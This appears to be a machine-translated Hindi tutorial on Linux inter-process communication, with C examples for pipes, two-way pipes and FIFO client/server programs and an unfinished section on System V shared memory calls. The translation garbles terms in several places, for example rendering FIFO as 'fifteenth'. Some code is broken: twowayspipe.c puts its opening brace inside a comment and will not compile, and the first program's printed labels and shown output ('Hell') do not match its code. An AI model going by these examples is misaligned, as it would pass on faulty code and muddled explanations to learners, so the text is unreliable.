Source Code: simplepipe.c

#include<stdio.h>
#include<unistd.h>

int main() {
   int pipefds[2];
   int returnstatus;
   char writemessages[2][20]={"Hi", "Hello"};
   char readmessage[20];
   returnstatus = pipe(pipefds);
   
   if (returnstatus == -1) {
      printf("Unable to create pipe\n");
      return 1;
   }
   
   printf("Writing to pipe - Message 1 is %s\n", writemessages[0]);
   write(pipefds[1], writemessages[0], sizeof(writemessages[0]));
   read(pipefds[0], readmessage, sizeof(readmessage));
   printf("Reading from pipe – Message 1 is %s\n", readmessage);
   printf("Writing to pipe - Message 2 is %s\n", writemessages[0]);
   write(pipefds[1], writemessages[1], sizeof(writemessages[0]));
   read(pipefds[0], readmessage, sizeof(readmessage));
   printf("Reading from pipe – Message 2 is %s\n", readmessage);
   return 0;
}

Note- आदर्श रूप से, हर सिस्टम कॉल के लिए रिटर्न स्टेटस की जाँच की जानी चाहिए। प्रक्रिया को सरल बनाने के लिए, सभी कॉल के लिए जांच नहीं की जाती है।

निष्पादन के चरण

संकलन

gcc -o simplepipe simplepipe.c

निष्पादन / आउटपुट

Writing to pipe - Message 1 is Hi
Reading from pipe – Message 1 is Hi
Writing to pipe - Message 2 is Hi
Reading from pipe – Message 2 is Hell

Example program 2 - माता-पिता और बच्चे की प्रक्रियाओं का उपयोग करके पाइप के माध्यम से दो संदेश लिखने और पढ़ने का कार्यक्रम।

कलन विधि

Step 1 - एक पाइप बनाएं।

Step 2 - एक बच्चे की प्रक्रिया बनाएँ।

Step 3 - मूल प्रक्रिया पाइप को लिखती है।

Step 4 - बाल प्रक्रिया पाइप से संदेश को पुनर्प्राप्त करती है और इसे मानक आउटपुट पर लिखती है।

Step 5 - चरण 3 और चरण 4 को एक बार फिर से दोहराएं।

Source Code: pipewithprocesses.c

#include<stdio.h>
#include<unistd.h>

int main() {
   int pipefds[2];
   int returnstatus;
   int pid;
   char writemessages[2][20]={"Hi", "Hello"};
   char readmessage[20];
   returnstatus = pipe(pipefds);
   if (returnstatus == -1) {
      printf("Unable to create pipe\n");
      return 1;
   }
   pid = fork();
   
   // Child process
   if (pid == 0) {
      read(pipefds[0], readmessage, sizeof(readmessage));
      printf("Child Process - Reading from pipe – Message 1 is %s\n", readmessage);
      read(pipefds[0], readmessage, sizeof(readmessage));
      printf("Child Process - Reading from pipe – Message 2 is %s\n", readmessage);
   } else { //Parent process
      printf("Parent Process - Writing to pipe - Message 1 is %s\n", writemessages[0]);
      write(pipefds[1], writemessages[0], sizeof(writemessages[0]));
      printf("Parent Process - Writing to pipe - Message 2 is %s\n", writemessages[1]);
      write(pipefds[1], writemessages[1], sizeof(writemessages[1]));
   }
   return 0;
}

निष्पादन के चरण

Compilation

gcc pipewithprocesses.c –o pipewithprocesses

Execution

Parent Process - Writing to pipe - Message 1 is Hi
Parent Process - Writing to pipe - Message 2 is Hello
Child Process - Reading from pipe – Message 1 is Hi
Child Process - Reading from pipe – Message 2 is Hello

दो तरह से संचार पाइप का उपयोग

पाइप संचार को केवल एक-तरफ़ा संचार के रूप में देखा जाता है, अर्थात, या तो मूल प्रक्रिया लिखती है और बाल प्रक्रिया पढ़ती है या इसके विपरीत लेकिन दोनों नहीं। हालाँकि, अगर माता-पिता और बच्चे दोनों को एक साथ पाइप से लिखने और पढ़ने की जरूरत है, तो समाधान पाइप का उपयोग करके दो-तरफ़ा संचार है। दो-तरफ़ा संचार स्थापित करने के लिए दो पाइप की आवश्यकता होती है।

निम्नलिखित दो-तरफ़ा संचार प्राप्त करने के चरण हैं -

Step 1- दो पाइप बनाएं। पहला लिखने के लिए माता-पिता के लिए है और बच्चे को पढ़ने के लिए, पाइप 1 के रूप में कहें। दूसरा एक बच्चे को लिखने और माता-पिता को पढ़ने के लिए है, पाइप 2 के रूप में कहें।

Step 2 - एक बच्चे की प्रक्रिया बनाएँ।

Step 3 - बंद अवांछित छोरों के रूप में केवल एक अंत प्रत्येक संचार के लिए आवश्यक है।

Step 4 - मूल प्रक्रिया में बंद अनचाहे सिरे, पाइप 1 का अंत पढ़ें और पाइप 2 का अंत लिखें।

Step 5 - बच्चे की प्रक्रिया में अवांछित छोरों को बंद करें, पाइप 1 का अंत लिखें और पाइप 2 का अंत पढ़ें।

Step 6 - आवश्यकतानुसार संचार करें।

नमूना कार्यक्रम

Sample program 1 - पाइपों का उपयोग करके दो-तरफ़ा संचार प्राप्त करना।

कलन विधि

Step 1 - लिखने के लिए मूल प्रक्रिया और बच्चे की प्रक्रिया के लिए पाइप 1 बनाएं।

Step 2 - लिखने के लिए बच्चे की प्रक्रिया और पढ़ने की मूल प्रक्रिया के लिए पाइप 2 बनाएं।

Step 3 - माता-पिता और बच्चे की तरफ से पाइप के अवांछित छोरों को बंद करें।

Step 4 - अभिभावक एक संदेश लिखने और स्क्रीन पर पढ़ने और प्रदर्शित करने के लिए बच्चे की प्रक्रिया लिखने की प्रक्रिया।

Step 5 - बाल प्रक्रिया स्क्रीन पर पढ़ने और प्रदर्शित करने के लिए एक संदेश और मूल प्रक्रिया लिखने के लिए।

Source Code: twowayspipe.c

#include<stdio.h>
#include<unistd.h>

int main() {
   int pipefds1[2], pipefds2[2];
   int returnstatus1, returnstatus2;
   int pid;
   char pipe1writemessage[20] = "Hi";
   char pipe2writemessage[20] = "Hello";
   char readmessage[20];
   returnstatus1 = pipe(pipefds1);
   
   if (returnstatus1 == -1) {
      printf("Unable to create pipe 1 \n");
      return 1;
   }
   returnstatus2 = pipe(pipefds2);
   
   if (returnstatus2 == -1) {
      printf("Unable to create pipe 2 \n");
      return 1;
   }
   pid = fork();
   
   if (pid != 0) // Parent process {
      close(pipefds1[0]); // Close the unwanted pipe1 read side
      close(pipefds2[1]); // Close the unwanted pipe2 write side
      printf("In Parent: Writing to pipe 1 – Message is %s\n", pipe1writemessage);
      write(pipefds1[1], pipe1writemessage, sizeof(pipe1writemessage));
      read(pipefds2[0], readmessage, sizeof(readmessage));
      printf("In Parent: Reading from pipe 2 – Message is %s\n", readmessage);
   } else { //child process
      close(pipefds1[1]); // Close the unwanted pipe1 write side
      close(pipefds2[0]); // Close the unwanted pipe2 read side
      read(pipefds1[0], readmessage, sizeof(readmessage));
      printf("In Child: Reading from pipe 1 – Message is %s\n", readmessage);
      printf("In Child: Writing to pipe 2 – Message is %s\n", pipe2writemessage);
      write(pipefds2[1], pipe2writemessage, sizeof(pipe2writemessage));
   }
   return 0;
}

निष्पादन के चरण

संकलन

gcc twowayspipe.c –o twowayspipe

क्रियान्वयन

In Parent: Writing to pipe 1 – Message is Hi
In Child: Reading from pipe 1 – Message is Hi
In Child: Writing to pipe 2 – Message is Hello
In Parent: Reading from pipe 2 – Message is Hello

पाइप्स संबंधित प्रक्रियाओं के बीच संचार के लिए थे। क्या हम असंबंधित प्रक्रिया संचार के लिए पाइप का उपयोग कर सकते हैं, कहते हैं, हम एक टर्मिनल से क्लाइंट प्रोग्राम और दूसरे टर्मिनल से सर्वर प्रोग्राम को निष्पादित करना चाहते हैं? इसका उत्तर है, फिर हम असंबंधित प्रक्रियाओं के संचार को कैसे प्राप्त कर सकते हैं, इसका सरल उत्तर है नामांकित पाइप्स। भले ही यह संबंधित प्रक्रियाओं के लिए काम करता है, लेकिन संबंधित प्रक्रिया संचार के लिए नामित पाइप का उपयोग करने का कोई अर्थ नहीं है।

हमने एक-तरफ़ा संचार के लिए एक पाइप और द्वि-दिशात्मक संचार के लिए दो पाइप का उपयोग किया। क्या नामांकित पाइप्स के लिए भी यही स्थिति लागू होती है। जवाब नहीं है, हम एकल नामित पाइप का उपयोग कर सकते हैं जिसका उपयोग दो-तरफ़ा संचार (सर्वर और क्लाइंट के बीच संचार, साथ ही क्लाइंट और सर्वर एक ही समय में किया जा सकता है) के रूप में नामांकित पाइप द्वि-दिशात्मक संचार का समर्थन करता है।

नामित पाइप का दूसरा नाम है FIFO (First-In-First-Out)। एक नामित पाइप बनाने के लिए सिस्टम कॉल (mknod ()) देखते हैं, जो एक विशेष फ़ाइल का एक प्रकार है।

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int mknod(const char *pathname, mode_t mode, dev_t dev);

यह सिस्टम कॉल एक विशेष फ़ाइल या फ़ाइल सिस्टम नोड बनाएगा, जैसे साधारण फ़ाइल, डिवाइस फ़ाइल या FIFO। सिस्टम कॉल के तर्क pathname, मोड और देव हैं। Pathname मोड और डिवाइस जानकारी की विशेषताओं के साथ। पथनाम सापेक्ष है, यदि निर्देशिका निर्दिष्ट नहीं है, तो इसे वर्तमान निर्देशिका में बनाया जाएगा। निर्दिष्ट मोड फ़ाइल का मोड है जो फ़ाइल प्रकार को निर्दिष्ट करता है जैसे फ़ाइल का प्रकार और फ़ाइल मोड निम्न तालिकाओं में उल्लिखित है। देव क्षेत्र को उपकरण की जानकारी जैसे प्रमुख और मामूली उपकरण संख्या निर्दिष्ट करना है।

फाइल का प्रकार विवरण फाइल का प्रकार विवरण
S_IFBLK विशेष ब्लॉक करें S_IFREG नियमित फाइल
S_IFCHR चरित्र विशेष S_IFDIR निर्देशिका
S_IFIFO FIFO विशेष S_IFLNK प्रतीकात्मक लिंक
फ़ाइल मोड विवरण फ़ाइल मोड विवरण
S_IRWXU स्वामी द्वारा पढ़ें, लिखें, निष्पादित करें / खोजें S_IWGRP अनुमति, समूह लिखें
S_IRUSR अनुमति पढ़ें, स्वामी S_IXGRP निष्पादन / खोज अनुमति, समूह
S_IWUSR अनुमति लिखें, मालिक S_IRWXO दूसरों द्वारा पढ़ें, लिखें, निष्पादित करें / खोजें
S_IXUSR निष्पादित / खोज अनुमति, स्वामी S_IROTH अनुमति पढ़ें, अन्य
S_IRWXG समूह द्वारा पढ़ें, लिखें, निष्पादित करें / खोजें S_IWOTH अनुमति लिखें, अन्य
S_IRGRP अनुमति, समूह पढ़ें S_IXOTH अनुमति / खोज अनुमति, अन्य

फ़ाइल मोड को 0XYZ जैसे ओक्टल नोटेशन में भी दर्शाया जा सकता है, जहां एक्स मालिक का प्रतिनिधित्व करता है, वाई समूह का प्रतिनिधित्व करता है, और जेड दूसरों का प्रतिनिधित्व करता है। X, Y या Z का मान 0 से 7. तक हो सकता है। पढ़ने, लिखने और निष्पादित करने के मूल्य क्रमशः 4, 2, 1 हैं। यदि पढ़ने, लिखने और निष्पादित करने के संयोजन में आवश्यक है, तो तदनुसार मूल्यों को जोड़ें।

कहते हैं, अगर हम 0640 का उल्लेख करते हैं, तो इसका मतलब स्वामी के लिए पढ़ना और लिखना (4 + 2 = 6) है, समूह के लिए पढ़ना (4) और दूसरों के लिए कोई अनुमतियाँ (0)।

यह कॉल सफलता पर शून्य और -1 विफलता के मामले में वापस आ जाएगी। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/types.h>
#include <sys/stat.h>

int mkfifo(const char *pathname, mode_t mode)

यह लाइब्रेरी फ़ंक्शन एक FIFO विशेष फ़ाइल बनाता है, जिसका उपयोग नामित पाइप के लिए किया जाता है। इस फ़ंक्शन के तर्क फ़ाइल नाम और मोड हैं। फ़ाइल का नाम या तो निरपेक्ष पथ या सापेक्ष पथ हो सकता है। यदि पूर्ण पथ नाम (या पूर्ण पथ) नहीं दिया गया है, तो फ़ाइल निष्पादन प्रक्रिया के वर्तमान फ़ोल्डर में बनाई जाएगी। फ़ाइल मोड जानकारी mknod () सिस्टम कॉल में वर्णित है।

यह कॉल सफलता पर शून्य और -1 विफलता के मामले में वापस आ जाएगी। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

आइए हम एक टर्मिनल पर सर्वर चलाने और दूसरे टर्मिनल पर क्लाइंट चलाने के एक प्रोग्राम पर विचार करें। कार्यक्रम केवल एकतरफा संचार करेगा। क्लाइंट उपयोगकर्ता इनपुट को स्वीकार करता है और सर्वर को संदेश भेजता है, सर्वर आउटपुट पर संदेश प्रिंट करता है। प्रक्रिया तब तक जारी रहती है जब तक उपयोगकर्ता स्ट्रिंग "अंत" में प्रवेश नहीं करता है।

आइए इसे एक उदाहरण से समझते हैं -

Step 1 - दो प्रक्रियाएं बनाएं, एक पंद्रहवीं और दूसरी पंद्रहवीं है।

Step 2 - सर्वर प्रक्रिया निम्नलिखित कार्य करती है -

  • एक नामांकित पाइप (सिस्टम कॉल mknod () का उपयोग करके) नाम "MYFIFO" बनाता है, अगर नहीं बनाया गया है।

  • केवल पढ़ने के लिए नामित पाइप खोलता है।

  • यहां, स्वामी के लिए पढ़ने और लिखने की अनुमति के साथ FIFO बनाया। समूह के लिए पढ़ें और दूसरों के लिए कोई अनुमति नहीं।

  • क्लाइंट से संदेश के लिए अनंत प्रतीक्षा करता है।

  • यदि क्लाइंट से प्राप्त संदेश "अंत" नहीं है, तो संदेश प्रिंट करता है। यदि संदेश "अंत" है, तो दिनांक को बंद करता है और इस प्रक्रिया को समाप्त करता है।

Step 3 - ग्राहक प्रक्रिया निम्नलिखित कार्य करती है -

  • केवल उद्देश्य लिखने के लिए नामित पाइप खोलता है।

  • उपयोगकर्ता से स्ट्रिंग को स्वीकार करता है।

  • चेक, यदि उपयोगकर्ता "अंत" या "अंत" के अलावा अन्य में प्रवेश करता है। किसी भी तरह से, यह सर्वर को एक संदेश भेजता है। हालाँकि, यदि स्ट्रिंग "अंत" है, तो यह FIFO को बंद कर देता है और प्रक्रिया को भी समाप्त कर देता है।

  • जब तक उपयोगकर्ता स्ट्रिंग "अंत" में प्रवेश नहीं करता तब तक असीम रूप से दोहराता है।

अब FIFO सर्वर फाइल पर एक नजर डालते हैं।

/* Filename: fifoserver.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "MYFIFO"
int main() {
   int fd;
   char readbuf[80];
   char end[10];
   int to_end;
   int read_bytes;
   
   /* Create the FIFO if it does not exist */
   mknod(FIFO_FILE, S_IFIFO|0640, 0);
   strcpy(end, "end");
   while(1) {
      fd = open(FIFO_FILE, O_RDONLY);
      read_bytes = read(fd, readbuf, sizeof(readbuf));
      readbuf[read_bytes] = '\0';
      printf("Received string: \"%s\" and length is %d\n", readbuf, (int)strlen(readbuf));
      to_end = strcmp(readbuf, end);
      if (to_end == 0) {
         close(fd);
         break;
      }
   }
   return 0;
}

संकलन और निष्पादन कदम

Received string: "this is string 1" and length is 16
Received string: "fifo test" and length is 9
Received string: "fifo client and server" and length is 22
Received string: "end" and length is 3

अब, FIFO क्लाइंट सैंपल कोड पर एक नज़र डालते हैं।

/* Filename: fifoclient.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "MYFIFO"
int main() {
   int fd;
   int end_process;
   int stringlen;
   char readbuf[80];
   char end_str[5];
   printf("FIFO_CLIENT: Send messages, infinitely, to end enter \"end\"\n");
   fd = open(FIFO_FILE, O_CREAT|O_WRONLY);
   strcpy(end_str, "end");
   
   while (1) {
      printf("Enter string: ");
      fgets(readbuf, sizeof(readbuf), stdin);
      stringlen = strlen(readbuf);
      readbuf[stringlen - 1] = '\0';
      end_process = strcmp(readbuf, end_str);
      
      //printf("end_process is %d\n", end_process);
      if (end_process != 0) {
         write(fd, readbuf, strlen(readbuf));
         printf("Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
      } else {
         write(fd, readbuf, strlen(readbuf));
         printf("Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
         close(fd);
         break;
      }
   }
   return 0;
}

चलिए आउटपुट पर आते हैं।

संकलन और निष्पादन कदम

FIFO_CLIENT: Send messages, infinitely, to end enter "end"
Enter string: this is string 1
Sent string: "this is string 1" and string length is 16
Enter string: fifo test
Sent string: "fifo test" and string length is 9
Enter string: fifo client and server
Sent string: "fifo client and server" and string length is 22
Enter string: end
Sent string: "end" and string length is 3

नामित पाइप्स का उपयोग करते हुए दो-तरफ़ा संचार

पाइपों के बीच संचार अप्रत्यक्ष रूप से होता है। पाइप को सामान्य रूप से एक-तरफ़ा संचार तक सीमित रखा गया था और दो-तरफ़ा संचार के लिए कम से कम दो पाइप की आवश्यकता थी। पाइप केवल अंतर-संबंधित प्रक्रियाओं के लिए हैं। पाइपों का उपयोग असंबंधित प्रक्रियाओं के संचार के लिए नहीं किया जा सकता है, कहते हैं, अगर हम एक टर्मिनल से एक प्रक्रिया और दूसरे टर्मिनल से दूसरी प्रक्रिया को निष्पादित करना चाहते हैं, तो यह पाइप के साथ संभव नहीं है। क्या हमारे पास दो प्रक्रियाओं के बीच संवाद करने का कोई सरल तरीका है, असंबंधित प्रक्रियाओं को सरल तरीके से कहें? इसका जवाब है हाँ। नामांकित पाइप दो या अधिक असंबंधित प्रक्रियाओं के बीच संचार के लिए है और इसमें द्वि-दिशात्मक संचार भी हो सकता है।

पहले से ही, हमने नामित पाइपों के बीच एक-दिशात्मक संचार देखा है, अर्थात क्लाइंट से सर्वर तक संदेश। अब, द्वि-दिशात्मक संचार यानी क्लाइंट को संदेश भेजने वाले सर्वर और संदेश प्राप्त करने वाले सर्वर पर एक नज़र डालें और उसी नामित पाइप का उपयोग करके ग्राहक को दूसरा संदेश भेजें।

निम्नलिखित एक उदाहरण है -

Step 1 - दो प्रक्रियाएँ बनाएँ, एक पंद्रहवाँ_वायु है और दूसरी पंद्रहवीं_वायु है।

Step 2 - सर्वर प्रक्रिया निम्नलिखित कार्य करती है -

  • यदि निर्मित नहीं है, तो एक नामांकित पाइप (लाइब्रेरी फ़ंक्शन mkfifo () का उपयोग करके) "फीफो_वॉवे" नाम से बनाता है।

  • पढ़ने और लिखने के उद्देश्यों के लिए नामित पाइप खोलता है।

  • यहां, स्वामी के लिए पढ़ने और लिखने की अनुमति के साथ FIFO बनाया। समूह के लिए पढ़ें और दूसरों के लिए कोई अनुमति नहीं।

  • ग्राहक से एक संदेश के लिए अनंत इंतजार करता है।

  • यदि क्लाइंट से प्राप्त संदेश "अंत" नहीं है, तो संदेश प्रिंट करता है और स्ट्रिंग को उलट देता है। उलटे हुए स्ट्रिंग को क्लाइंट को वापस भेज दिया जाता है। यदि संदेश "अंत" है, तो दिनांक को बंद करता है और इस प्रक्रिया को समाप्त करता है।

Step 3 - ग्राहक प्रक्रिया निम्नलिखित कार्य करती है -

  • पढ़ने और लिखने के उद्देश्यों के लिए नामित पाइप खोलता है।

  • उपयोगकर्ता से स्ट्रिंग स्वीकार करता है।

  • चेक, यदि उपयोगकर्ता "अंत" या "अंत" के अलावा अन्य में प्रवेश करता है। किसी भी तरह से, यह सर्वर को एक संदेश भेजता है। हालाँकि, यदि स्ट्रिंग "अंत" है, तो यह FIFO को बंद कर देता है और प्रक्रिया को भी समाप्त कर देता है।

  • यदि संदेश "अंत" के रूप में नहीं भेजा जाता है, तो यह ग्राहक से संदेश (उलट स्ट्रिंग) की प्रतीक्षा करता है और उलट स्ट्रिंग को प्रिंट करता है।

  • जब तक उपयोगकर्ता स्ट्रिंग "अंत" में प्रवेश नहीं करता तब तक असीम रूप से दोहराता है।

अब, FIFO सर्वर के नमूना कोड पर एक नज़र डालते हैं।

/* Filename: fifoserver_twoway.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "/tmp/fifo_twoway"
void reverse_string(char *);
int main() {
   int fd;
   char readbuf[80];
   char end[10];
   int to_end;
   int read_bytes;
   
   /* Create the FIFO if it does not exist */
   mkfifo(FIFO_FILE, S_IFIFO|0640);
   strcpy(end, "end");
   fd = open(FIFO_FILE, O_RDWR);
   while(1) {
      read_bytes = read(fd, readbuf, sizeof(readbuf));
      readbuf[read_bytes] = '\0';
      printf("FIFOSERVER: Received string: \"%s\" and length is %d\n", readbuf, (int)strlen(readbuf));
      to_end = strcmp(readbuf, end);
      
      if (to_end == 0) {
         close(fd);
         break;
      }
      reverse_string(readbuf);
      printf("FIFOSERVER: Sending Reversed String: \"%s\" and length is %d\n", readbuf, (int) strlen(readbuf));
      write(fd, readbuf, strlen(readbuf));
      /*
      sleep - This is to make sure other process reads this, otherwise this
      process would retrieve the message
      */
      sleep(2);
   }
   return 0;
}

void reverse_string(char *str) {
   int last, limit, first;
   char temp;
   last = strlen(str) - 1;
   limit = last/2;
   first = 0;
   
   while (first < last) {
      temp = str[first];
      str[first] = str[last];
      str[last] = temp;
      first++;
      last--;
   }
   return;
}

संकलन और निष्पादन कदम

FIFOSERVER: Received string: "LINUX IPCs" and length is 10
FIFOSERVER: Sending Reversed String: "sCPI XUNIL" and length is 10
FIFOSERVER: Received string: "Inter Process Communication" and length is 27
FIFOSERVER: Sending Reversed String: "noitacinummoC ssecorP retnI" and length is 27
FIFOSERVER: Received string: "end" and length is 3

अब, FIFO ग्राहक के नमूना कोड पर एक नज़र डालते हैं।

/* Filename: fifoclient_twoway.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "/tmp/fifo_twoway"
int main() {
   int fd;
   int end_process;
   int stringlen;
   int read_bytes;
   char readbuf[80];
   char end_str[5];
   printf("FIFO_CLIENT: Send messages, infinitely, to end enter \"end\"\n");
   fd = open(FIFO_FILE, O_CREAT|O_RDWR);
   strcpy(end_str, "end");
   
   while (1) {
      printf("Enter string: ");
      fgets(readbuf, sizeof(readbuf), stdin);
      stringlen = strlen(readbuf);
      readbuf[stringlen - 1] = '\0';
      end_process = strcmp(readbuf, end_str);
      
      //printf("end_process is %d\n", end_process);
      if (end_process != 0) {
         write(fd, readbuf, strlen(readbuf));
         printf("FIFOCLIENT: Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
         read_bytes = read(fd, readbuf, sizeof(readbuf));
         readbuf[read_bytes] = '\0';
         printf("FIFOCLIENT: Received string: \"%s\" and length is %d\n", readbuf, (int)strlen(readbuf));
      } else {
         write(fd, readbuf, strlen(readbuf));
         printf("FIFOCLIENT: Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
         close(fd);
         break;
      }
   }
   return 0;
}

संकलन और निष्पादन कदम

FIFO_CLIENT: Send messages, infinitely, to end enter "end"
Enter string: LINUX IPCs
FIFOCLIENT: Sent string: "LINUX IPCs" and string length is 10
FIFOCLIENT: Received string: "sCPI XUNIL" and length is 10
Enter string: Inter Process Communication
FIFOCLIENT: Sent string: "Inter Process Communication" and string length is 27
FIFOCLIENT: Received string: "noitacinummoC ssecorP retnI" and length is 27
Enter string: end
FIFOCLIENT: Sent string: "end" and string length is 3

साझा मेमोरी दो या दो से अधिक प्रक्रियाओं के बीच साझा की गई मेमोरी है। हालाँकि, हमें स्मृति या संचार के कुछ अन्य साधनों को साझा करने की आवश्यकता क्यों है?

पुनरावृत्ति करने के लिए, प्रत्येक प्रक्रिया का अपना पता स्थान होता है, यदि कोई भी प्रक्रिया अपने स्वयं के पते स्थान से अन्य प्रक्रियाओं के लिए कुछ जानकारी के साथ संवाद करना चाहती है, तो यह केवल आईपीसी (अंतर प्रक्रिया संचार) तकनीकों के साथ संभव है। जैसा कि हम पहले से ही जानते हैं, संचार संबंधित या असंबंधित प्रक्रियाओं के बीच हो सकता है।

आमतौर पर, अंतर-संबंधित प्रक्रिया संचार पाइप या नामांकित पाइप का उपयोग करके किया जाता है। असंबंधित प्रक्रियाएं (कहते हैं कि एक टर्मिनल में चल रही एक प्रक्रिया और दूसरे टर्मिनल में एक अन्य प्रक्रिया) संचार नामांकित पाइप्स का उपयोग करके या साझा मेमोरी और संदेश कतार की लोकप्रिय आईपीसी तकनीकों के माध्यम से किया जा सकता है।

हमने पाइप्स और नामांकित पाइपों की आईपीसी तकनीकों को देखा है और अब यह शेष आईपीसी तकनीकों को साझा करने का समय है। साझा मेमोरी, संदेश कतार, सेमीफोर, सिग्नल और मेमोरी मैपिंग।

इस अध्याय में, हम सभी साझा की गई मेमोरी के बारे में जानेंगे।

हम जानते हैं कि दो या दो से अधिक प्रक्रियाओं के बीच संवाद करने के लिए, हम साझा मेमोरी का उपयोग करते हैं लेकिन साझा मेमोरी का उपयोग करने से पहले सिस्टम कॉल के साथ क्या करना है, आइए इसे देखते हैं -

  • साझा मेमोरी सेगमेंट बनाएं या पहले से बनाए गए साझा मेमोरी सेगमेंट (shmget ()) का उपयोग करें

  • पहले से बनाए गए साझा किए गए मेमोरी सेगमेंट में प्रक्रिया संलग्न करें (shmat ())

  • पहले से ही साझा की गई मेमोरी सेगमेंट (shmdt ()) से प्रक्रिया को अलग करें

  • साझा स्मृति खंड (shmctl ()) पर नियंत्रण संचालन

आइए हम साझा मेमोरी से संबंधित सिस्टम कॉल के कुछ विवरण देखें।

#include <sys/ipc.h>
#include <sys/shm.h>

int shmget(key_t key, size_t size, int shmflg)

उपरोक्त सिस्टम कॉल सिस्टम V साझा मेमोरी सेगमेंट बनाता है या आवंटित करता है। जिन तर्कों को पारित करने की आवश्यकता है, वे इस प्रकार हैं -

first argument, key,साझा मेमोरी सेगमेंट को पहचानता है। कुंजी या तो एक मनमाना मूल्य हो सकती है या एक जो लाइब्रेरी फंक्शन ftok () से ली जा सकती है। कुंजी भी IPC_PRIVATE हो सकती है, साधन, सर्वर और क्लाइंट (माता-पिता और बच्चे के संबंध) के रूप में चल रही प्रक्रियाएं, अर्थात, अंतर-संबंधित प्रक्रिया संचार। यदि ग्राहक इस कुंजी के साथ साझा मेमोरी का उपयोग करना चाहता है, तो यह सर्वर की एक बाल प्रक्रिया होनी चाहिए। इसके अलावा, माता-पिता द्वारा साझा स्मृति प्राप्त करने के बाद बच्चे की प्रक्रिया को बनाने की आवश्यकता होती है।

second argument, size, PAGE_SIZE के कई पर साझा किए गए साझा मेमोरी सेगमेंट का आकार है।

third argument, shmflg,IPC_CREAT (नया सेगमेंट बनाना) या IPC_EXCL (नए सेगमेंट बनाने के लिए IPC_CREAT के साथ उपयोग किया जाता है और कॉल विफल रहता है, जैसे कि पहले से मौजूद है) जैसे आवश्यक साझा किए गए मेमोरी फ्लैग साथ ही परमिशन पास करने की जरूरत है।

Note - अनुमतियों के विवरण के लिए पहले के खंड देखें।

यह कॉल एक वैध साझा मेमोरी पहचानकर्ता (साझा मेमोरी के आगे कॉल के लिए उपयोग किया जाता है) को सफलता पर और -1 विफलता के मामले में लौटाएगा। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/types.h>
#include <sys/shm.h>

void * shmat(int shmid, const void *shmaddr, int shmflg)

उपरोक्त सिस्टम कॉल सिस्टम V साझा मेमोरी सेगमेंट के लिए साझा मेमोरी ऑपरेशन करता है, जो कॉलिंग प्रोसेस के एड्रेस स्पेस में एक साझा मेमोरी सेगमेंट संलग्न करता है। जिन तर्कों को पारित करने की आवश्यकता है, वे इस प्रकार हैं -

The first argument, shmid,साझा मेमोरी सेगमेंट का पहचानकर्ता है। यह आईडी शेयर्ड मेमोरी आइडेंटिफायर है, जो shmget () सिस्टम कॉल का रिटर्न वैल्यू है।

The second argument, shmaddr,अनुलग्नक का पता निर्दिष्ट करना है। यदि shmaddr NULL है, तो सिस्टम डिफ़ॉल्ट रूप से सेगमेंट संलग्न करने के लिए उपयुक्त पता चुनता है। यदि shmaddr NULL नहीं है और SHM_RND को shmflg में निर्दिष्ट किया गया है, तो अनुलग्नक SHMLBA (लोअर बाउंड्री एड्रेस) के निकटतम कई के पते के बराबर है। अन्यथा, shmaddr एक पृष्ठ संरेखित पता होना चाहिए जिस पर साझा मेमोरी अटैचमेंट होता है / शुरू होता है।

The third argument, shmflg, एसएचएम_आरएनडी (एसएचएमएलबीए के पते को बंद करना) या एसएचएम_ईएक्सईसी (खंड की सामग्री को निष्पादित करने की अनुमति देता है) या SHM_RDONLY (खंड को केवल-पढ़ने के उद्देश्य से संलग्न करता है, डिफ़ॉल्ट रूप से रीड-राइट है) या SHM_REMAP (shammdr द्वारा निर्दिष्ट सीमा में मौजूदा मैपिंग को प्रतिस्थापित करता है और खंड के अंत तक जारी रहता है)।

यह कॉल सफलता पर संलग्न साझा मेमोरी सेगमेंट का पता और विफलता के मामले में -1 लौटाएगा। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/types.h>
#include <sys/shm.h>

int shmdt(const void *shmaddr)

उपरोक्त सिस्टम कॉल कॉलिंग प्रक्रिया के एड्रेस स्पेस से साझा मेमोरी सेगमेंट को अलग करने के लिए सिस्टम V द्वारा साझा मेमोरी सेगमेंट के लिए साझा मेमोरी ऑपरेशन करता है। इस तर्क को पारित करने की आवश्यकता है -

तर्क, शमाद्र, साझा किए जाने वाले साझा मेमोरी सेगमेंट का पता है। शट-टू-डिटैच्ड सेगमेंट को शमाट () सिस्टम कॉल द्वारा दिया गया पता होना चाहिए।

यह कॉल सफलता पर 0 और असफलता के मामले में -1 होगी। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

#include <sys/ipc.h>
#include <sys/shm.h>

int shmctl(int shmid, int cmd, struct shmid_ds *buf)

उपरोक्त सिस्टम कॉल सिस्टम V साझा मेमोरी सेगमेंट के लिए नियंत्रण ऑपरेशन करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

पहला तर्क, shmid, साझा मेमोरी सेगमेंट का पहचानकर्ता है। यह आईडी शेयर्ड मेमोरी आइडेंटिफायर है, जो shmget () सिस्टम कॉल का रिटर्न वैल्यू है।

दूसरा तर्क, cmd, साझा मेमोरी सेगमेंट पर आवश्यक नियंत्रण ऑपरेशन करने के लिए कमांड है।

Cmd के लिए मान्य मान हैं -

